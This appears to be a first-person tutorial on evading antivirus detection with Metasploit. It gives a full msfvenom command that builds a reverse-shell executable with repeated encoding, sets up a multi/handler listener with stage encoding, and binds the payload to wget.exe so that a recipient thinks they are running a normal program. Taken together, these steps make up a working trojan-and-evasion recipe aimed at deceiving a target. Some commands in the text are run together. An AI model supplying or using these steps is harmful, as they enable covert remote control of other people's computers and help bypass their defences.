Premise
In this tutorial, I explained how to evade AntiVirus detection using Metasploit. I used msfvenom on windows 7 testing box and I did the attack with a normal shellcode and with shellcode binded to wget binary tool This technique may not work on Antiviruses with strong detection engines. In that case, we may need to use advanced obfuscation techniques.
Skills Learned
- Metasploit Framework
- Antivirus Evasion
Creating an Undetectable Executable
My first step is to use a command with msfVenom to create my payload. Here’s the command I use:
msfVenom -p Windows/shell_reverse_tcp LHOST=<your_machine_IP> LPORT=4343 -f exe -i 9 -o ShellCode5.exe
Let me break that down for you:
-p Windows/shell_reverse_tcp: This tellsmsfVenomthat I want a non-staged payload for Windows.LHOST: This is my local machine’s IP address.LPORT: This is the port I’ll be listening on, which in this case is 4343.-f exe: I want the output to be an executable file.-i 9: This is the magic part. I’m using an obfuscation technique with nine iterations to make it much harder for antivirus software to detect.-o ShellCode5.exe: This is just the name of my output file.
This command will create an executable file that’s designed to slip past basic antivirus signatures. I should note that this technique is more likely to work on older systems like Windows 7, but it’s still a great starting point.
Setting Up My Listener
Now, before I send this payload to my target, I need to set up a listener to catch the connection when it comes back. I’ll use the exploit/multi/handler for this.
It’s crucial that the payload I use for my listener is the exact same one I created with msfVenom. I’ll also need to make sure that my LHOST and LPORT settings match what I used in the payload.
Evading Antivirus with Staged Payloads
To make my attack even stealthier, I’m going to send the payload in stages. A non-staged payload sends the entire shell code at once, which makes it easier for antivirus to detect.
To get around this, I’ll enable a stage encoder:
set enable_stage_encoding trueset stage_encoder x86
By sending the payload in stages, the first part will establish a connection, and only after that connection is confirmed will the second part (the actual shell code) be sent. This is a great way to fly under the radar. Once I have these options set, I’ll run exploit to start my listener.
Binding My Shell Code to a Legitimate File
To make my attack even more convincing, I’m going to bind my shell code to an existing executable file. This way, the person I’m sending it to will think they’re just opening a regular program.
I can use the -x option with msfVenom to select a binary file to bind my shell code to. In my demo, I tried to bind my payload to wget.exe.
I ran into a bit of an error here, and after some troubleshooting, I realized it was because of an architecture mismatch. My target machine was a 32-bit system, but I had generated a 64-bit payload. If I had matched the architecture correctly, the attack would have worked, and I would have received a session back on my listener. It’s a great reminder to always double-check your target’s system architecture!
